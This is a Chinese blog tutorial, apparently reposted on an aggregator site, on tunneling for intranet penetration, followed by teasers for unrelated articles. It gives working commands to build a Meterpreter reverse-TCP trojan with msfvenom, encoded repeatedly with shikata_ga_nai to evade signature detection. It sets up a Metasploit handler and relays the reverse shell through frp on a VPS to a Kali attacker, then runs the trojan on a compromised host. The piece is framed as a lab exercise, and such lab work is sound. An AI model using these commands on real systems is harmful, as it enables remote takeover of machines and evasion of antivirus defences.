内网渗透——隧道代理

文章目录

  • 代理
    • 代理使用场景
    • VPS
    • 建立隧道
    • frp
    • MSF木马生成
    • 监听
    • 开启frp服务端和客户端
    • 执行exe木马文件

代理

实验环境

  • 攻击机kali:192.168.188.133(NAT模式)

  • 模拟的公网服务器(本机):10.9.75.239

  • 失陷主机:10.9.75.145(桥接模式)

代理使用场景

  1. 拿下远程的Web服务器。
  2. Webshell连接不稳定,需要使用稳定的木马程序。
  3. 远程服务器无法直接连接攻击者的电脑。
  4. 需要借助公网的vps转发来在失陷服务器的木马流量。
  5. 借助frp服务端(vps)和客户端(内网攻击者)建立隧道。
  6. 当vps某个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量到frpc。

前提条件

拿下了公网上的一台主机(8.8.8.8)的webshell的权限,需要上传完整功能的木马文件。那么有一个问题,木马执行了后要找谁?此时的失陷主机是连接不到内网的攻击主机,这个时候就需要用到代理技术。

VPS

VPS是Virtual Private Serve的英文缩写,即虚拟专用服务器。VPS就是将一台物理服务器分割成多个独立的虚拟专项服务器,每一个VPS都可以分配独立的公网IP地址,独立的操作系统,能够实现不同VPS的磁盘空间、CPU资源、内存、系统等配置的隔离,通过虚拟技术让每一个用户使用VPS的时候都像是在使用一台独立服务器一样,自定义安装自己需要的东西。

公网VPS:

  • 可以理解为服务器上的虚拟机,攻击者可控。

  • 攻击者和受害者服务器都可以访问到。

建立隧道

image-20231013201014251

因为远程VPS不能访问攻击者的Kali主机。攻击者与远程VPS需要建立隧道,远程VPS使用7000端口建立一个监听(可以说隧道服务或者是代理服务),这样远程VPS就能够访问攻击者主机。还需要将远程VPS的4444端口的流量通过7000端口发送给攻击者的Kali。(代理的核心)

给失陷Web服务器的木马内容:

  • host:当木马执行的时候,去连接公网上的远程VPS。

  • post:连接远程VPS的4444端口。

frp

frp可以实现端口转发,端口监听,隧道功能。frp分为客户端和服务端。

Kali上启动的是客户端(frpc)

本机上启动的是服务端(frps)

frp运行起来的时候会自动的将7000端口开放,当然该端口可以在配置文件中进行修改。这样客户端和服务端就可以连接上了,他们之间就会有一个隧道。

远程VPS服务器的4444端口会主动转发数据流量给客户端的4444端口,不做任何操作,通过frp建立的隧道发送给远程连接的客户端的端口,至于转发给客户端的哪个端口,是由frpc的配置文件来决定的。

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.239 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

命令解析

  • -p:指定生成的Payload类型为Windows平台的Meterpreter反向TCP Shell。

  • LHOST=10.9.75.239:指定反向连接的目标IP地址,这里是将连接的目标设置为10.9.75.239。(这里就是将木马的数据流量信息发送给远程VPS服务器)

  • LPORT=4444:指定反向连接的目标端口号,这里是将连接的目标端口设置为4444。

  • -e x86/shikata_ga_nai:对生成的Payload使用x86/shikata_ga_nai编码进行混淆,以绕过一些基于特征签名的检测。

  • -f exe:生成的Payload格式为可执行文件(.exe)。

  • -o shell.exe:指定生成的Payload保存的文件名为shell.exe。

  • -i 5:Payload的迭代次数,表示对Payload进行重复编码的次数,以增加混淆程度和绕过某些检测。

image-20231013202806600

监听

使用msf进行监听

msfconsole

载入监控模块

use exploit/multi/handler

加载payload

set payload windows/meterpreter/reverse_tcp
set lport 4444					# 监听本机的4444端口
set lhost 127.0.0.1				# 监听本机的IP地址也就是127.0.0.1
run

image-20231013203620037

查看Kali主机监听的端口号信息

ss -antpl

image-20231013203709384

命令的解析:

  • ss:是一个替代传统的netstat命令的工具,用于显示套接字(socket)统计信息。
  • -a:显示所有的套接字连接,包括监听中的和已建立的连接。
  • -n:以数值形式显示IP地址和端口号,而不进行反向解析。
  • -t:只显示TCP协议相关的连接。
  • -p:显示每个连接所对应的进程ID和进程名称。
  • -l:只显示监听(处于侦听状态)的套接字连接。

开启frp服务端和客户端

注意:先开启frp服务端再开启frp的客户端

开启frp服务端

.\frps.exe -c frps.ini

说明:-c表示指定服务端的配置文件。

image-20231013204220234

开启frp客户端

将frp压缩包先进行一个解压操作。

image-20231013204557619

修改frpc的配置文件。

vim frpc.ini

image-20231013210008466

当通过远程的frp服务器的7000端口连接好后,下面的配置信息[msf]就生效了。

[msf]配置信息使用TCP协议进行通信,当远程VPS的4444端口收到数据的时候会发送数据到kali本地地址的4444端口。

开启frp客户端

./frpc -c frpc.ini

image-20231013211226982

启动成功。

frp服务端情况:

image-20231013211432687

执行exe木马文件

将木马文件上传到失陷主机上,双击执行即可。

image-20231013211717006

kali攻击机成功监听。

image-20231013211817679

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/106205.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

kube-controller-manager和kube-scheduler不能正常启动

kube-controller-manager和kube-scheduler不能正常启动

kube-controller-manager-k8s-worker01和kube-scheduler-k8s-worker01没有启动起来 原因: 解决:进入/etc/kubernetes/manifests 编辑 将镜像地址修改为 然后重启kubelet:systemctl restart kubelet.service
阅读更多...
freefilesync文件同步软件

freefilesync文件同步软件

下载 下载链接 https://freefilesync.org/download.php 往下拉,看到下载的链接 下载windows版本 下载地址: https://freefilesync.org/download/FreeFileSync_13.0_Windows_Setup.exe 直接复制到浏览器中访问就能下载 安装 双击安装包,一路默…
阅读更多...
Megatron-LM GPT 源码分析(二) Sequence Parallel分析

Megatron-LM GPT 源码分析(二) Sequence Parallel分析

引用 本文基于开源代码 https://github.com/NVIDIA/Megatron-LM ,延续上一篇Megatron-LM GPT 源码分析(一) Tensor Parallel分析 通过对GPT的模型运行示例,从三个维度 - 模型结构、代码运行、代码逻辑说明 对其源码做深入的分析。…
阅读更多...
zookeeper应用场景(二)

zookeeper应用场景(二)

单机环境下可以利用jvm级别的锁,比如synchronized、Lock等来实现锁,如果是多机部署就需要一个共享数据存储区域来实现分布式锁 一、分布式锁实现方式 1、基于数据库实现分布式锁 可以用数据库唯一索引来实现 2、基于redis实现分布式锁 redis实现的分…
阅读更多...
【Vue面试题二十六】、SSR解决了什么问题?有做过SSR吗?你是怎么做的?

【Vue面试题二十六】、SSR解决了什么问题?有做过SSR吗?你是怎么做的?

文章底部有个人公众号:热爱技术的小郑。主要分享开发知识、学习资料、毕业设计指导等。有兴趣的可以关注一下。为何分享? 踩过的坑没必要让别人在再踩,自己复盘也能加深记忆。利己利人、所谓双赢。 面试官:SSR解决了什么问题&…
阅读更多...
回归预测 | MATLAB实现IBES-ELM基于改进的秃鹰搜索优化算法优化极限学习机的数据回归预测(多指标,多图)

回归预测 | MATLAB实现IBES-ELM基于改进的秃鹰搜索优化算法优化极限学习机的数据回归预测(多指标,多图)

回归预测 | MATLAB实现IBES-ELM 基于改进的秃鹰搜索优化算法优化极限学习机的数据回归预测(多指标,多图) 目录 回归预测 | MATLAB实现IBES-ELM 基于改进的秃鹰搜索优化算法优化极限学习机的数据回归预测(多指标,多图&a…
阅读更多...
变分自动编码器 (VAE)02/2 PyTorch 教程

变分自动编码器 (VAE)02/2 PyTorch 教程

一、说明 在自动编码器中,来自输入数据的信息被映射到固定的潜在表示中。当我们旨在训练模型以生成确定性预测时,这特别有用。相比之下,变分自动编码器(VAE)将输入数据转换为变分表示向量(顾名思义&#xf…
阅读更多...
服务器崩溃前的数据拯救实践

服务器崩溃前的数据拯救实践

前言 在服务器的VMWARE ESXi系统环境中,我们经常需要创建虚拟机来运行各种应用程序。然而,服务器如果偶尔出现自动重启以及紫屏报错的问题,说明服务器内部出现了故障,一般情况下重启机器能够解决问题,但时间一长&…
阅读更多...
[23] IPDreamer: Appearance-Controllable 3D Object Generation with Image Prompts

[23] IPDreamer: Appearance-Controllable 3D Object Generation with Image Prompts

pdf Text-to-3D任务中,对3D模型外观的控制不强,本文提出IPDreamer来解决该问题。在NeRF Training阶段,IPDreamer根据文本用ControlNet生成参考图,并将参考图作为Zero 1-to-3的控制条件,用基于Zero 1-to-3的SDS损失生成…
阅读更多...
网络类型与数据链路层协议

网络类型与数据链路层协议

目录 整体大纲图 一、网络类型 二、数据链路层协议 1、MA网络 2、P2P网络 1)HDLC协议 2)PPP协议 a、特点及其数据帧封装结构 b、组成及其工作过程 c、ppp会话流程及ppp验证 d、ppp配置命令 f、ppp mp 整体大纲图 一、网络类型 二、数据链路层…
阅读更多...
系统文件IO、文件描述符fd、重定向、文件系统、动态库和静态库

系统文件IO、文件描述符fd、重定向、文件系统、动态库和静态库

目录 C文件接口系统文件I/O系统调用和库函数文件描述符0 & 1 & 2FILE和fd的关系文件描述符的分配规则 重定向重定向的本质输出重定向输入重定向追加重定向 dup2函数 FILE理解文件系统了解磁盘的物理结构逻辑抽象文件系统文件系统的图解和解析通过文件系统来理解ls -al通…
阅读更多...
MySQL 3 环境搭建 MySQL 5.7版本的安装、配置

MySQL 3 环境搭建 MySQL 5.7版本的安装、配置

MySQL5.7.43官网下载地址 MySQL :: Download MySQL Community Server 这里选5.7.43,Windows版本,然后点击Go to Download Page,下载msi安装包的版本 MSI安装包版本比ZIP压缩包版本的安装过程要简单的多,过程更加清楚直观&#x…
阅读更多...
MATLAB——径向基神经网络预测程序

MATLAB——径向基神经网络预测程序

欢迎关注公众号“电击小子程高兴的MATLAB小屋” %% 学习目标:径向基神经网络 %% 可以以任意精度逼近任意连续函数 clear all; close all; P1:10; T[2.523 2.434 3.356 4.115 5.834 6.967 7.098 8.315 9.387 9.928]; netnewrbe(P,T,2); %建立精确的径向基…
阅读更多...
KMP 算法 + 详细笔记

KMP 算法 + 详细笔记

给两个字符串,T"AAAAAAAAB",P"AAAAB"; 可以暴力匹配,但是太费时和效率不太好。于是KMP问世,我们一起来探究一下吧!!! (一)最长公共前后缀 D[i] p[…
阅读更多...
【C/C++数据结构 - 2】:稳定性与优化揭秘,揭开插入排序、希尔排序和快速排序的神秘面纱!

【C/C++数据结构 - 2】:稳定性与优化揭秘,揭开插入排序、希尔排序和快速排序的神秘面纱!

文章目录 排序的稳定性插入排序插入排序的优化 希尔排序快速排序 排序的稳定性 稳定排序:排序前2个相等的数在序列中的前后位置顺序和排序后它们2个的前后位置顺序相同。(比如:冒泡、插入、基数、归并) 非稳定排序:排…
阅读更多...
进化算法------微生物进化算法(MGA)

进化算法------微生物进化算法(MGA)

前言 该文章写在GA算法之后:GA算法 遗传算法 (GA)的问题在于没有有效保留好的父母 (Elitism), 让好的父母不会消失掉. Microbial GA (后面统称 MGA) 就是一个很好的保留 Elitism 的算法. 一句话来概括: 在袋子里抽两个球, 对比两个球, 把球大的放回袋子里, 把球小…
阅读更多...
ARMv5架构对齐访问异常问题

ARMv5架构对齐访问异常问题

strh非对齐访问 在ARMv5架构中,对于strh指令(Store Halfword),通常是要求对地址进行对齐访问的。ARMv5架构对于半字(Halfword)的存储操作有对齐要求,即地址必须是2的倍数。 如果尝试使用strh指…
阅读更多...
vue3 状态管理pinia

vue3 状态管理pinia

1. 什么是Pinia Pinia 是 Vue 的专属的最新状态管理库 ,是 Vuex 状态管理工具的替代品 特点优势: 提供更加简单的API(去掉了mutation)提供符合组合式风格的API(和Vue3新语法统一)去掉modules的概念,每一个store都是一个独立的模块配合TypeScript更加友好,提供可靠的…
阅读更多...
网站的常见攻击与防护方法

网站的常见攻击与防护方法

在互联网时代,几乎每个网站都存在着潜在的安全威胁。这些威胁可能来自人为失误,也可能源自网络犯罪团伙所发起的复杂攻击。无论攻击的本质如何,网络攻击者的主要动机通常是谋求经济利益。这意味着无论您经营的是电子商务项目还是小型商业网站…
阅读更多...
【Redis】Set集合相关的命令

【Redis】Set集合相关的命令

目录 命令SADDSMEMBERSSISMEMBERSCARDSPOPSMOVESREMSINTERSINTERSTORESUNIONSUNIONSTORESDIFFSDIFFSTORE 命令 SADD 将⼀个或者多个元素添加到set中。注意,重复的元素⽆法添加到set中。 SADD key member [member ...]SMEMBERS 获取⼀个set中的所有元素&#xff0…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023